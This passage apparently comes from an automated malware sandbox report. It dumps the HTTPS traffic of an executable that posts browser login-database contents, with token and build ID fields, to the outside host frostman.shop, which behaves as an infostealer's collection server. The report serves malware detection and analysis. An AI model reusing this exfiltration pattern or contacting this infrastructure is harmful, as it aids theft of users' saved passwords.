                                                                                                                                                                                                                                                                              2024-12-20 06:31:44 UTC1390INData Raw: 3f 08 3f f4 d3 de f8 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e
                                                                                                                                                                                                                                                                              Data Ascii: ??AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN
                                                                                                                                                                                                                                                                              2024-12-20 06:31:44 UTC1390INData Raw: 4f 0b c5 44 73 d4 f2 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89
                                                                                                                                                                                                                                                                              Data Ascii: ODsQNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYy


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              26192.168.2.749858116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:45 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----ZCJMOPPPH4EUAIEK6PHL
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 68733
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:45 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 43 4a 4d 4f 50 50 50 48 34 45 55 41 49 45 4b 36 50 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 4a 4d 4f 50 50 50 48 34 45 55 41 49 45 4b 36 50 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 4a 4d 4f 50 50 50 48 34 45 55 41 49 45 4b 36 50 48 4c 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------ZCJMOPPPH4EUAIEK6PHLContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------ZCJMOPPPH4EUAIEK6PHLContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------ZCJMOPPPH4EUAIEK6PHLCont
                                                                                                                                                                                                                                                                              2024-12-20 06:31:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:45 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68
                                                                                                                                                                                                                                                                              Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
                                                                                                                                                                                                                                                                              2024-12-20 06:31:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:45 UTC3313OUTData Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31
                                                                                                                                                                                                                                                                              Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
                                                                                                                                                                                                                                                                              2024-12-20 06:31:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:46 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:31:47 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              27192.168.2.749870116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:47 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----IMO8YUKFUSJM7YMOPPPH
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 262605
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:47 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4d 4f 38 59 55 4b 46 55 53 4a 4d 37 59 4d 4f 50 50 50 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 49 4d 4f 38 59 55 4b 46 55 53 4a 4d 37 59 4d 4f 50 50 50 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 49 4d 4f 38 59 55 4b 46 55 53 4a 4d 37 59 4d 4f 50 50 50 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------IMO8YUKFUSJM7YMOPPPHContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------IMO8YUKFUSJM7YMOPPPHContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------IMO8YUKFUSJM7YMOPPPHCont
                                                                                                                                                                                                                                                                              2024-12-20 06:31:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:47 UTC16355OUTData Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e
                                                                                                                                                                                                                                                                              Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
